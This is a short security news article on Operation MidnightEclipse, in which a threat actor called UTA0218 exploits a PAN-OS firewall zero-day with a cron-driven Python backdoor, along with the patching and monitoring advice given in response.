Threat actors have been exploiting a zero-day flaw in Palo Alto Networks PAN-OS software since March 26, 2024, identified as Operation MidnightEclipse, allowing attackers to execute arbitrary code with root privileges on vulnerable firewalls. The attack involves creating a cron job to fetch commands from an external server and execute them using a bash shell. The attackers manage an access control list for the command-and-control server to restrict access.
The attack involves a Python-based backdoor hosted on a separate server, which writes and launches another Python script to execute the threat actor’s commands. The backdoor component is responsible for running the commands and writing the results to legitimate files associated with the firewall. The goal is to avoid leaving traces of the command outputs by overwriting the files within 15 seconds.
The threat actor, known as UTA0218, has been observed exploiting the firewall to create a reverse shell, download additional tools, pivot into internal networks, and exfiltrate data. The campaign’s scale is currently unclear, but the attacker has shown a high level of capability and speed in achieving their objectives, targeting domain backup keys, active directory credentials, and user workstations.
Organizations are advised to monitor for signs of lateral movement internally from their Palo Alto Networks GlobalProtect firewall device. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog, requiring federal agencies to apply patches by April 19. Palo Alto Networks is expected to release fixes by April 14.
The attack highlights the ongoing risk of targeting edge devices by sophisticated threat actors. UTA0218 is suspected to be a state-backed threat actor based on their resources, target victims, and capabilities. It is crucial for organizations to remain vigilant and apply security patches promptly to mitigate potential threats.
Source link